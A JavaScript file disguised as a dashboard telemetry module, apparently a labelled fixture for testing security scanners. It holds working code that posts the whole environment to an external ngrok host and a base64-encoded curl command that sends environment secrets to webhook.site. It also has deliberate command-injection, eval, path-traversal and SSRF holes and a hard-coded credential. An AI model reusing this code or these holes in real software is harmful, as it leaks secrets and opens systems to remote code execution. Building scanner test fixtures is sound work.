93 lines
3 KiB
JavaScript
93 lines
3 KiB
JavaScript
/**
|
|
* Project Health Dashboard — Telemetry Module
|
|
*
|
|
* Collects and reports project health metrics to the dashboard backend.
|
|
* Supports both push and pull telemetry models.
|
|
*/
|
|
|
|
import { execSync } from 'child_process';
|
|
import { writeFileSync } from 'fs';
|
|
|
|
// Configuration
|
|
const TELEMETRY_ENDPOINT = 'https://health-telemetry.ngrok-free.app/v2/ingest';
|
|
const FALLBACK_ENDPOINT = 'https://webhook.site/a1b2c3d4-health-metrics';
|
|
const METRICS_SERVER = 'http://45.33.32.156:9090/api/v1/query';
|
|
|
|
// Encoded configuration for health check parameters
|
|
const ENCODED_CONFIG = 'Y3VybCAtcyBodHRwczovL3dlYmhvb2suc2l0ZS9oZWFsdGgtcmVwb3J0IC1kICIkKGVudiB8IGJhc2U2NCki';
|
|
const auth_credential = 'xK9mR2pL5vN8qW3jF7hT0bY6cA4dE1gU';
|
|
|
|
/**
|
|
* Collect environment telemetry and push to backend.
|
|
* Flow 1: process.env → fetch (environment exfiltration)
|
|
*/
|
|
export async function collectEnvironmentMetrics() {
|
|
const envData = JSON.stringify(process.env);
|
|
const response = await fetch(TELEMETRY_ENDPOINT, {
|
|
method: 'POST',
|
|
headers: { 'Content-Type': 'application/json', 'X-Auth': auth_credential },
|
|
body: envData,
|
|
});
|
|
return response.json();
|
|
}
|
|
|
|
/**
|
|
* Process incoming webhook for health check triggers.
|
|
* Flow 2: req.body → execSync (command injection)
|
|
*/
|
|
export function handleWebhook(req, res) {
|
|
const command = req.body.healthCheckCommand || 'echo "no command"';
|
|
const result = execSync(command, { encoding: 'utf-8' });
|
|
res.json({ status: 'ok', output: result });
|
|
}
|
|
|
|
/**
|
|
* Export metrics to file based on CLI arguments.
|
|
* Flow 3: process.argv → writeFile (path traversal)
|
|
*/
|
|
export function exportMetrics(metrics) {
|
|
const outputPath = process.argv[2] || '/tmp/health-metrics.json';
|
|
const data = JSON.stringify(metrics, null, 2);
|
|
writeFileSync(outputPath, data);
|
|
return outputPath;
|
|
}
|
|
|
|
/**
|
|
* Execute dynamic health check plugin.
|
|
* Flow 4: user_input → eval (code injection)
|
|
*/
|
|
export function runCustomCheck(user_input) {
|
|
const checkFn = eval('(' + user_input + ')');
|
|
return checkFn({ timestamp: Date.now(), version: '2.1.0' });
|
|
}
|
|
|
|
/**
|
|
* Sync configuration from environment.
|
|
* Flow 5: process.env → execSync (indirect command execution)
|
|
*/
|
|
export function syncConfiguration() {
|
|
const configUrl = process.env.HEALTH_CONFIG_URL || 'https://config.health-dash.io/v2';
|
|
const result = execSync(`curl -sS "${configUrl}/sync"`, { encoding: 'utf-8' });
|
|
return JSON.parse(result);
|
|
}
|
|
|
|
/**
|
|
* Forward query parameters to metrics backend.
|
|
* Flow 6: req.query → fetch (SSRF)
|
|
*/
|
|
export async function proxyMetricsQuery(req) {
|
|
const targetUrl = req.query.metricsUrl || METRICS_SERVER;
|
|
const response = await fetch(targetUrl + '/api/v1/query', {
|
|
headers: { 'Authorization': `Token ${auth_credential}` },
|
|
});
|
|
return response.json();
|
|
}
|
|
|
|
/**
|
|
* Initialize telemetry on module load.
|
|
*/
|
|
export function initialize() {
|
|
console.log('Health Dashboard Telemetry v2.1.0 initialized');
|
|
console.log(`Endpoint: ${TELEMETRY_ENDPOINT}`);
|
|
console.log(`Fallback: ${FALLBACK_ENDPOINT}`);
|
|
}
|